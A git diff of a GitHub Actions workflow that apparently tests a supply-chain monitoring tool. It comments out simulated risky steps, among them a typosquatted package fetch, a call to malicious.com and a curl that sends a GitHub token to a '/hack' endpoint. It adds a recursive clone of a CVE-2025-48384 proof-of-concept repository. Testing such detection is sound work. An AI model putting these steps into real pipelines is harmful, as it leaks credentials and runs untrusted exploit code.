Update INVISIRISK.yml

diff --git a/.github/workflows/INVISIRISK.yml b/.github/workflows/INVISIRISK.yml
--- a/.github/workflows/INVISIRISK.yml
+++ b/.github/workflows/INVISIRISK.yml
@@ -42,73 +42,77 @@ jobs:
         with:
           python-version: "3.9"
 
-      - name: docker
-        run: docker pull testcontainers/ryuk:0.12.0
+      - name: clone vul repo
+        run: git clone --recursive https://github.com/acheong08/CVE-2025-48384
 
-      - name: Install downgraded package
-        continue-on-error: true
-        run: pip install requests==2.31.0
+      # - name: docker
+      #   run: docker pull testcontainers/ryuk:0.12.0
 
-      - name: Install from unexpected source
-        continue-on-error: true
-        run: pip install numpy==1.9.3 --no-deps --index-url https://test.pypi.org/simple/
-
-      - name: Install typosquatted package
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/requestss-7.2.0-py2.py3-none-any.whl.metadata
-
-      - name: Install with different checksum
-        continue-on-error: true
-        run: pip install --no-cache-dir --no-deps boto3==1.4.0 --index-url https://test.pypi.org/simple/
-
-      - name: Contact new endpoint
-        continue-on-error: true
-        run: curl https://malicious.com/
-
-      - name: Run unusual command
-        continue-on-error: true
-        run: wget https://www.w3.org/TR/PNG/iso_8859-1.txt
-
-      - name: Create unexpected file
-        continue-on-error: true
-        run: echo "Suspicious content" > suspicious2.txt
-
-      - name: Make cURL request
-        run: curl https://package-registry.free.beeceptor.com/packages
-
-      # - name: Simulate long-running task
+      # - name: Install downgraded package
       #   continue-on-error: true
-      #   run: sleep 200 
+      #   run: pip install requests==2.31.0
 
-      # - name: 😈 Execute malicious script
-      #   run: bash run_malicious_scripts.sh
+      # - name: Install from unexpected source
+      #   continue-on-error: true
+      #   run: pip install numpy==1.9.3 --no-deps --index-url https://test.pypi.org/simple/
 
-      - name: Secret Leak Policy
-        run: |
-          curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
-            -H "Content-Type: application/json" \
-            -d '{
-            "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
-          }'
-          echo "Exit code: $?"
+      # - name: Install typosquatted package
+      #   continue-on-error: true
+      #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/requestss-7.2.0-py2.py3-none-any.whl.metadata
+
+      # - name: Install with different checksum
+      #   continue-on-error: true
+      #   run: pip install --no-cache-dir --no-deps boto3==1.4.0 --index-url https://test.pypi.org/simple/
+
+      # - name: Contact new endpoint
+      #   continue-on-error: true
+      #   run: curl https://malicious.com/
+
+      # - name: Run unusual command
+      #   continue-on-error: true
+      #   run: wget https://www.w3.org/TR/PNG/iso_8859-1.txt
+
+      # - name: Create unexpected file
+      #   continue-on-error: true
+      #   run: echo "Suspicious content" > suspicious2.txt
+
+      # - name: Make cURL request
+      #   run: curl https://package-registry.free.beeceptor.com/packages
+
+      # # - name: Simulate long-running task
+      # #   continue-on-error: true
+      # #   run: sleep 200 
+
+      # # - name: 😈 Execute malicious script
+      # #   run: bash run_malicious_scripts.sh
+
+      # - name: Secret Leak Policy
+      #   run: |
+      #     curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
+      #       -H "Content-Type: application/json" \
+      #       -d '{
+      #       "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+      #     }'
+      #     echo "Exit code: $?"
           
-      - name: Response Status Code Policy (Trigger 400 Bad Request)
-        run: curl -k -X POST https://api.github.com/endpoint
+      # - name: Response Status Code Policy (Trigger 400 Bad Request)
+      #   run: curl -k -X POST https://api.github.com/endpoint
 
-      - name: Mime Type Policy
-        run: curl -s -L "https://tinyurl.com/invisirisk"
+      # - name: Mime Type Policy
+      #   run: curl -s -L "https://tinyurl.com/invisirisk"
+
+
+      # - name: Send POST request with curl
+      #   run: |
+      #     curl -X POST https://example.com/api \
+      #       -H "Content-Type: application/json" \
+      #       -d '{"key1":"value1", "key2":"value2"}'
+
+      # - name: new host      
+      #   run: curl https://www.google.com
 
       - name: Install dependencies
         run: pip install -r requirements.txt
-
-      - name: Send POST request with curl
-        run: |
-          curl -X POST https://example.com/api \
-            -H "Content-Type: application/json" \
-            -d '{"key1":"value1", "key2":"value2"}'
-
-      - name: new host      
-        run: curl https://www.google.com
 
       - name: Cleanup PSE
         if: always()
@@ -129,4 +133,5 @@ jobs:
           app_token: ${{ secrets.IR_API_KEY_GIT_STAGE }}
           send_job_status: "true"
           debug: "true"
+
 
